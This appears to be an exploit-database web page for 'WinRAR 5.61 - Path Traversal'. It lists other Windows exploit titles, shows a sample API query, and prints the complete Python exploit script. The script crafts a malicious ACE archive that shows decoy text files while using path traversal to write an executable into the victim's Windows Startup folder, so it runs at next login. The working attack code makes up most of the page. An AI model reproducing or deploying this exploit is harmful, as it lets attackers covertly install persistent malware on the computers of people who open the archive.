Menu

Improved exploit search engine. Try it out

"WinRAR 5.61 - Path Traversal"

Author

WyAtu

Platform

windows

Release date

2019-02-22

Release Date Title Type Platform Author
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
2019-05-24 "Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow" local windows "Uday Mittal"
2019-05-15 "Microsoft Windows - 'Win32k' Local Privilege Escalation" local windows ExpLife0011
2019-05-22 "Microsoft Internet Explorer 11 - Sandbox Escape" local windows SandboxEscaper
2019-05-22 "Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation" local windows "Google Security Research"
2019-05-22 "Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 (17763.379) - Install DLL" local windows SandboxEscaper
2019-05-24 "Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)" dos windows Achilles
2019-05-24 "Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-23 "Terminal Services Manager 3.2.1 - Denial of Service" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Share Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Add Block' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-22 "TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "BlueStacks 4.80.0.1060 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-21 "Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "docPrint Pro 8.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "PCL Converter 2.7 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "Encrypt PDF 2.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
Release Date Title Type Platform Author
2019-02-22 "WinRAR 5.61 - Path Traversal" local windows WyAtu
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46552/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46552/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46552/40992/winrar-561-path-traversal/download/", "exploit_id": "46552", "exploit_description": "\"WinRAR 5.61 - Path Traversal\"", "exploit_date": "2019-02-22", "exploit_author": "WyAtu", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
#!/usr/bin/env python3

import os
import re
import zlib
import binascii

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

class AceCRC32:
    def __init__(self, buf=b''):
        self.__state = 0
        if len(buf) > 0:
            self += buf

    def __iadd__(self, buf):
        self.__state = zlib.crc32(buf, self.__state)
        return self

    def __eq__(self, other):
        return self.sum == other

    def __format__(self, format_spec):
        return self.sum.__format__(format_spec)

    def __str__(self):
        return "0x%08x" % self.sum

    @property
    def sum(self):
        return self.__state ^ 0xFFFFFFFF

def ace_crc32(buf):
    return AceCRC32(buf).sum

def get_ace_crc32(filename):
    with open(filename, 'rb') as f:
        return ace_crc32(f.read())

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

def modify_hdr_crc(shellcode, filename):
    hdr_crc_raw = get_right_hdr_crc(filename)
    shellcode_new = shellcode.replace("6789", hdr_crc_raw)
    return shellcode_new

def hex2raw4(hex_value):
    while len(hex_value) < 4:
        hex_value = '0' + hex_value
    return hex_value[2:] + hex_value[:2]

def hex2raw8(hex_value):
    while len(hex_value) < 8:
        hex_value = '0' + hex_value
    return hex_value[6:] + hex_value[4:6] + hex_value[2:4] + hex_value[:2]

def get_file_content(filename):
    with open(filename, 'rb') as f:
        return str(binascii.hexlify(f.read()))[2:-1] # [2:-1] to remote b'...'

def make_shellcode(filename, target_filename):
    if target_filename == "":
        target_filename = filename
    hdr_crc_raw = "6789"
    hdr_size_raw = hex2raw4(str(hex(len(target_filename)+31))[2:])
    packsize_raw = hex2raw8(str(hex(os.path.getsize(filename)))[2:])
    origsize_raw = packsize_raw
    crc32_raw = hex2raw8(str(hex(get_ace_crc32(filename)))[2:])
    filename_len_raw = hex2raw4(str(hex(len(target_filename)))[2:])
    filename_raw = "".join("{:x}".format(ord(c)) for c in target_filename)
    content_raw = get_file_content(filename)
    shellcode = hdr_crc_raw + hdr_size_raw + "010180" + packsize_raw \
              + origsize_raw + "63B0554E20000000" + crc32_raw + "00030A005445"\
              + filename_len_raw + filename_raw + "01020304050607080910A1A2A3A4A5A6A7A8A9"
    return shellcode

def build_file(shellcode, filename):
    with open(filename, "wb") as f:
        f.write(binascii.a2b_hex(shellcode.upper()))

def build_file_add(shellcode, filename):
    with open(filename, "ab+") as f:
        f.write(binascii.a2b_hex(shellcode.upper()))

def build_file_once(filename, target_filename=""):
    shellcode = make_shellcode(filename, target_filename)
    build_file_add(shellcode, rar_filename)
    shellcode_new = modify_hdr_crc(shellcode, rar_filename)
    content_raw = get_file_content(rar_filename).upper()
    build_file(content_raw.replace(shellcode.upper(), shellcode_new.upper()).replace("01020304050607080910A1A2A3A4A5A6A7A8A9", get_file_content(filename)), rar_filename)

if __name__ == '__main__':
    print("[*] Start to generate the archive file %s..."%(rar_filename))

    shellcode_head = "6B2831000000902A2A4143452A2A141402001018564E974FF6AA00000000162A554E524547495354455245442056455253494F4E2A"
    build_file(shellcode_head, rar_filename)

    for i in range(len(filename_list)):
        build_file_once(filename_list[i])

    build_file_once(evil_filename, target_filename)

    print("[+] Evil archive file %s generated successfully !"%(rar_filename))